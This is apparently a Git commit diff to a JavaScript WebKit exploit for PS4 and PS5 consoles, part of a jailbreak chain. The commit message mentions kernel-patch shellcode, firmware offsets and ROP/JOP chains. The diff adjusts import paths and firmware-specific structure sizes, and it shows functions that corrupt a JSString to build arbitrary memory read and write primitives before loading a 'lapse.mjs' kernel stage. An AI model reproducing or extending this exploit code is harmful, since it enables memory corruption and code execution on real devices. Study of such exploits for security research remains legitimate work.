Prep for multi-fw and publishing on GitHub
### Added - `.gitignore` for kpatch output - Auto detect console type and firmware in `config.mjs` - Used elsewhere to determine which offsets/patches/ROP chain are used - WIP: Add 8.50-9.60 support - All offsets found - Running into some issue here. Wiped out my JOP chains to redo them... ### Fixed - Call `lapse.mjs` rather than `code.mjs` - Makefile for kpatch builds all currently available ### Changed - Use relative locations rather than absolute - Changed kpatch binaries to just be shellcode vs full ELFs - 5,216 bytes to 257 bytes. - Build kpatch binaries with `-Os` rather than `-O` - 257 bytes to 233 bytes. - Renamed/Formatted `CHANGELOG.md`, `README.md`, and `LICENSE`
This commit is contained in:
Al Azif
@@ -33,10 +33,10 @@ along with this program. If not, see <https://www.gnu.org/licenses/>. */
|
||||
// * Helped in figuring out the size of JSC::ArrayBufferContents and its
|
||||
// needed offsets on different firmwares (PS5).
|
||||
|
||||
import { Int } from '/module/int64.mjs';
|
||||
import { Memory } from '/module/mem.mjs';
|
||||
import { KB, MB } from '/module/offset.mjs';
|
||||
import { BufferView } from '/module/rw.mjs';
|
||||
import { Int } from './module/int64.mjs';
|
||||
import { Memory } from './module/mem.mjs';
|
||||
import { KB, MB } from './module/offset.mjs';
|
||||
import { BufferView } from './module/rw.mjs';
|
||||
|
||||
import {
|
||||
die,
|
||||
@@ -46,10 +46,10 @@ import {
|
||||
sleep,
|
||||
hex,
|
||||
align,
|
||||
} from '/module/utils.mjs';
|
||||
} from './module/utils.mjs';
|
||||
|
||||
import * as config from '/config.mjs';
|
||||
import * as off from '/module/offset.mjs';
|
||||
import * as config from './config.mjs';
|
||||
import * as off from './module/offset.mjs';
|
||||
|
||||
// check if we are running on a supported firmware version
|
||||
const [is_ps4, version] = (() => {
|
||||
@@ -72,18 +72,22 @@ const [is_ps4, version] = (() => {
|
||||
})();
|
||||
|
||||
const ssv_len = (() => {
|
||||
if (0x600 <= config.target && config.target < 0x650) {
|
||||
return 0x58;
|
||||
}
|
||||
|
||||
// PS4 9.xx and all supported PS5 versions
|
||||
if (config.target >= 0x900) {
|
||||
// All supported PS5 versions
|
||||
if (!is_ps4) {
|
||||
return 0x50;
|
||||
}
|
||||
|
||||
if (0x650 <= config.target && config.target < 0x900) {
|
||||
// PS4
|
||||
if (0x600 <= version && version < 0x650) {
|
||||
return 0x58;
|
||||
}
|
||||
if (0x650 <= version && version < 0x900) {
|
||||
return 0x48;
|
||||
}
|
||||
if (0x900 <= version) {
|
||||
return 0x50;
|
||||
}
|
||||
throw new RangeError(`unsupported console/firmware: ps${is_ps4 ? '4' : '5'}, version: ${hex(version)}`);
|
||||
})();
|
||||
|
||||
// these constants are expected to be divisible by 2
|
||||
@@ -454,7 +458,7 @@ async function make_rdr(view) {
|
||||
log(`view's buffer address: ${addr}`);
|
||||
return new Reader(rstr, view);
|
||||
}
|
||||
die("JSString wasn't modified");
|
||||
die('JSString wasn\'t modified');
|
||||
}
|
||||
|
||||
// we will create a JSC::CodeBlock whose m_constantRegisters is set to an array
|
||||
@@ -856,7 +860,6 @@ async function main() {
|
||||
await make_arw(rdr, view2, pop);
|
||||
|
||||
clear_log();
|
||||
// path to your script that will use the exploit
|
||||
import('./code.mjs');
|
||||
import('./lapse.mjs');
|
||||
}
|
||||
main();
|
||||
|
||||
Reference in New Issue
Block a user